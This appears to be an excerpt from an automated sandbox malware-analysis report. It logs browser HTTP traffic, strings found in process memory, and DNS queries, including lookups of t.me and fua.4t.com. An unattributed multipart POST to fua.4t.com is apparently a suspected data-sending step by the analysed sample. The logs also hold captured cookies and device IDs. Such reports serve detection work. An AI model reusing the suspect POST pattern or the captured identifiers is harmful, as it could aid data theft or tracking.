Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.96ac23719317b1928681.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.3sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=D1ACD80E7D0E4D12A9FE9F71FBE6AE3D.RefC=2025-02-26T07:11:23Z; USRLOC=; MUID=2D46568907146C271CFD431606766D23; MUIDB=2D46568907146C271CFD431606766D23; _EDGE_S=F=1&SID=1396748ABA746BD70F236115BBA06AA5; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.bd02dd0f5f9b69ef8b17.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.974be19b726ee5d36d07.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.e407aa81c62081bf13cf.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.03034e8cce25cc183275.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/ASuc5ohcoRYyASTWkAI21BvR0f-Aos7pzgW3GtD8ImYoX-O9Pl77join3GT-5wpD1vT_nG6xpJ0eds7JOZacv0OYNfBAee3mKSnMDx3-YDnz3J7UxfHM_wfhsyHz9Z8rajAAxlKa5T9frrLlN0KHGfJRu7Y7NseNtZ_M/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=2D46568907146C271CFD431606766D23; _EDGE_S=F=1&SID=1396748ABA746BD70F236115BBA06AA5; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1740553887867&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=d1acd80e7d0e4d12a9fe9f71fbe6ae3d&activityId=d1acd80e7d0e4d12a9fe9f71fbe6ae3d&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=2D46568907146C271CFD431606766D23; _EDGE_S=F=1&SID=1396748ABA746BD70F236115BBA06AA5; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /b?rn=1740553887868&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2D46568907146C271CFD431606766D23&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b2?rn=1740553887868&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2D46568907146C271CFD431606766D23&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=17Aad62b5eea8e667fd72d41740553889; XID=17Aad62b5eea8e667fd72d41740553889
Source: global traffic	HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 4.7sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=D1ACD80E7D0E4D12A9FE9F71FBE6AE3D.RefC=2025-02-26T07:11:23Z; USRLOC=; MUID=2D46568907146C271CFD431606766D23; MUIDB=2D46568907146C271CFD431606766D23; _EDGE_S=F=1&SID=1396748ABA746BD70F236115BBA06AA5; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=82f59c9d-7df8-4cea-83cb-7beb2f48fb72; ai_session=kbwYhrQGeiwmlbmvMnjLJu\|1740553887862\|1740553887862; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=D1ACD80E7D0E4D12A9FE9F71FBE6AE3D.RefC=2025-02-26T07:11:23Z
Source: global traffic	HTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: /Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":42,"imageId":"BB1msMIu","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=D1ACD80E7D0E4D12A9FE9F71FBE6AE3D.RefC=2025-02-26T07:11:23Z; USRLOC=; MUID=2D46568907146C271CFD431606766D23; MUIDB=2D46568907146C271CFD431606766D23; _EDGE_S=F=1&SID=1396748ABA746BD70F236115BBA06AA5; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=82f59c9d-7df8-4cea-83cb-7beb2f48fb72; ai_session=kbwYhrQGeiwmlbmvMnjLJu\|1740553887862\|1740553887862; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=D1ACD80E7D0E4D12A9FE9F71FBE6AE3D.RefC=2025-02-26T07:11:23Z
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1740553887867&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=d1acd80e7d0e4d12a9fe9f71fbe6ae3d&activityId=d1acd80e7d0e4d12a9fe9f71fbe6ae3d&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=12901D879AA04FA9A0A42F546BB12A75&MUID=2D46568907146C271CFD431606766D23 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=2D46568907146C271CFD431606766D23; _EDGE_S=F=1&SID=1396748ABA746BD70F236115BBA06AA5; _EDGE_V=1; SM=T; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D

Source: 4bd04289-bcac-45b1-9944-5df03e68aa94.tmp.12.dr	String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000007.00000002.2026771530.000051E002D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000007.00000003.1945264837.000051E003134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1945197659.000051E00317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1945067130.000051E002590000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000007.00000003.1945264837.000051E003134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1945197659.000051E00317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1945067130.000051E002590000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000007.00000003.1971948126.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1973797443.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1981181567.000051E00351C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000007.00000003.1971948126.000051E00351C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)
Source: chrome.exe, 00000007.00000003.1973797443.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1981181567.000051E00351C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2029580719.000051E00351C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaoglQ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000007.00000002.2024377867.000051E0028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/Q equals www.youtube.com (Youtube)
Source: chrome.exe, 00000007.00000002.2021906339.000051E0024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2028984895.000051E003248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027508814.000051E002F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000007.00000002.2029448819.000051E0033DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlaultQ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000007.00000002.2027508814.000051E002F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)
Source: chrome.exe, 00000007.00000002.2028984895.000051E003248000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlr equals www.youtube.com (Youtube)
Source: chrome.exe, 00000007.00000002.2019213351.000051E00221C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: fua.4t.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----cbaaa1vsjekn7ycbaiecUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0Host: fua.4t.comContent-Length: 255Connection: Keep-AliveCache-Control: no-cache

Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2025084933.000051E0029E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000007.00000003.1943221135.000051E002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1943246152.000051E002F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000002.2027071148.000051E002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
